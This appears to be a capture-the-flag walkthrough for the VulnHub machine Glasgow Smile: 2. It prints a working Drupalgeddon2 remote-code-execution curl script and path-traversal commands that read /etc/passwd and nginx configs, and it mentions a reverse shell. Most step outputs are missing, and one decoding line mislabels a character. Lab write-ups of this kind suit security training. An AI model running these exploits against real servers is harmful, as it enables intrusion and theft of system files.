Glasgow Smile: 2 Walkthrough

Reasonable Doubt

2020-08-11 (Updated: 2020-08-14)

vulnhub

reference	Glasgow Smile: 2
target ip	192.168.1.12

Scan with nmap:

Enumerate extension txt with gobuster:

http://192.168.1.12/todo.txt reveals there’s a bash script:

Enumerate extension sh with gobuster:

http://192.168.1.12/joke.sh reveals http://192.168.1.12/Glasgow---Smile2/:

Request http://192.168.1.12/Glasgow---Smile2/:

Enumerate with droopescan:

The exploit is derived from Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution (PoC).

44448_fix.sh

#!/bin/bash

usage() {
    cat <<HERE
usage: $0 baseurl cmd

e.g. $0 http://127.0.0.1 "id"
HERE
}

[[ $# -ne 2 ]] &&
    usage &&
    exit 1

baseurl="$1"
cmd="$2"

curl -s -XPOST "${baseurl}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
    -d "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=${cmd}"

Reverse shell:

/etc/passwd:

Enumerate local ports:

SSH remote port forward:

Request http://127.0.0.1:18080:

Local file inclusion http://127.0.0.1:18080/?page=../../../../../../../etc/passwd:

Enumerate /etc/nginx/nginx.conf.

1	curl -s "http://127.0.0.1:18080/?page=../../../../../../../etc/nginx/nginx.conf" \| egrep -v "^$\|^#"

Enumerate /etc/nginx/sites-enabled/default.conf.

1	curl -s "http://127.0.0.1:18080/?page=../../../../../../../etc/nginx/sites-enabled/default.conf" \| egrep -v "^$\|^\s*#"

http://192.168.1.12/helpmeriddlernewapplication returns 404:

Request /var/www/myplace/hereis/threatened/index.php with LFI again:

The riddle’s answer is here, which leads to user riddler’s password:

/home/riddler/user.txt:

Format and try to restore /home/riddler/theworldmustbeburned/burn:

burn.php

<?php
function grdl($file){
    $fp = fopen($file,'r') or die();

    $count = 0;
    while(!feof($fp)) {
        $t = fgets($fp);
        $count++;
    }
    rewind($fp);
    $i=0;
    $random=rand(0,$count);
    while((!feof($fp))&&($i<=$random)) {
        if($result=fgets($fp, 1048576)) {
            $i++;
        }
    }

    fclose($fp) or die();
    return $result;
}

function gws($key){
    $array_key = str_split($key);
    $result = 0;
    foreach($array_key as $ele){
        $result += ord($ele);
    }
    return $result;
}

function encrypt($key1,$key2,$input){
    $is_true = true;
    $gws_key1 = gws($key1); // 2154
    $gws_key2 = gws($key2); // 2190
    $array_input = str_split($input);
    $result = "";
    foreach($array_input as $ele) {
        $is_true = !$is_true; // $is_true 0    1
        $p = $gws_key1;       // $p       k1   k2
        if($is_true) {
            $p = $gws_key2;
        }

        $result .= ord($ele) + $p;
        if($is_true) {        // $result  F    A
            $result .= "A";
        } else {
            $result .= "F";
        }
    }
    return $result;
}

$file = "jokerinthepack";
$input = readline("Enter the string to encrypt: ");
$key1 = trim(grdl($file));
$key2 = trim(grdl($file));
print "\n";
print "Your keys:";
print "\n";
print "Key 1: ".$key1;
print "\n";
print "Key 2: ".$key2;
print "\n";
$encrypted = trim(encrypt($key1,$key2,$input));
print "Encrypted string:".$encrypted."\n\n\n";

?>

Encrypted string from /home/riddler/theworldmustbeburned/message.txt is split by F/A.

Take the first one 2188F as an example.

ord($ele) = 2188 - 2154 = 34 which is 4.

Here’s my decrypt script (which cannot be used directly):

decrypt.py

with open("./message.restore.txt") as fp:
    for line in fp:
        l = line.strip()
        num = int(l[:len(l)-1])
        if l[-1] == "F":
            num -= 2154
        if l[-1] == "A":
            num -= 2190

        print(chr(num))